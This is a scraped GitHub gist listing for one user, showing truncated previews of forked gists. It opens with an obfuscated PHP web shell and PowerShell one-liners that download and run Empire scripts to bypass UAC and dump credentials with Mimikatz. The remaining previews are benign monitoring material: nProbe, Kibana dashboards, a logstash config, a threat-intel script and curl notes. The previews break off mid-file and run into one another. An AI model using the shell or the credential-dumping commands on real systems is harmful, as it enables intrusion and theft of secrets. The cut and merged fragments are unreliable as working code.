Xpwd andr6

  • Planet Earth
andr6 / rev_shell.php
Created May 7, 2023 10:34 — forked from 0xSojalSec/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced: \xa0\xb8\xba\xab will be
* treated as a constant, therefore no " is needed. It is also not a
* copyable string because of the non-ASCII characters.
*
* Explanation:
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
andr6 / start_nprobe
Created January 18, 2019 14:05 — forked from evoxco/start_nprobe
Nprobe command line with ElasticSearch logging
/usr/local/bin/nprobe -b 0 -i eth1 --json-labels -t 60 --elastic "nProbe;nprobe;http://127.0.0.1:9200/_bulk" -T "%IPV4_SRC_ADDR %L4_SRC_PORT %IPV4_DST_ADDR %L4_DST_PORT %PROTOCOL %IN_BYTES %OUT_BYTES %FIRST_SWITCHED %LAST_SWITCHED %IN_PKTS %OUT_PKTS %IP_PROTOCOL_VERSION %APPLICATION_ID %L7_PROTO_NAME %ICMP_TYPE %SRC_IP_COUNTRY %DST_IP_COUNTRY %APPL_LATENCY_MS %HTTP_URL %HTTP_RET_CODE %HTTP_REFERER %HTTP_UA %HTTP_MIME %HTTP_HOST %HTTP_FBOOK_CHAT %HTTP_SITE %HTTP_METHOD" -G 2>/tmp/log
andr6 / checkthreatfeed.py
Created January 18, 2019 14:04 — forked from evoxco/checkthreatfeed.py
Open source Threat intel check via C1fApp API
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
usage:
cat something_withIPs | python checkthreatfeed.py
www.c1fapp.com
'''
import sys
andr6 / pfsense3.json
Created January 18, 2019 14:04 — forked from evoxco/pfsense3.json
PFSense kibana dashboard
{
"title": "PFSense Firewall",
"services": {
"query": {
"idQueue": [],
"list": {
"0": {
"query": "tags: \"PFSense\" AND action: \"pass\"",
"alias": "Passed",
"color": "#6ED0E0",
andr6 / pfsense-logstash.conf
Created January 18, 2019 14:04 — forked from evoxco/pfsense-logstash.conf
PFSense 2.1 logstash config
input {
tcp {
type => syslog
port => 514
}
udp {
type => syslog
port => 514
}
}
andr6 / BroIDS-Kibana-Dashboard
Created January 18, 2019 14:03 — forked from evoxco/BroIDS-Kibana-Dashboard
Bro ids Kibana Dashboard [Part 1]
{
"title": "Broids",
"services": {
"query": {
"list": {
"0": {
"id": 0,
"color": "#7EB26D",
"alias": "All Connections",
"pin": true,
andr6 / c1fappThreatIntell
Created January 18, 2019 14:03 — forked from evoxco/c1fappThreatIntell
C1fApp Threat Intelligence Kibana dashboard
{
"title": "C1fApp Threat Intelligence",
"services": {
"query": {
"list": {
"0": {
"query": "index: \"cif\"",
"alias": "Cif Index",
"color": "#7EB26D",
"id": 0,
andr6 / curl.md
Created February 19, 2018 09:05 — forked from subfuzion/curl.md
curl POST examples

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.
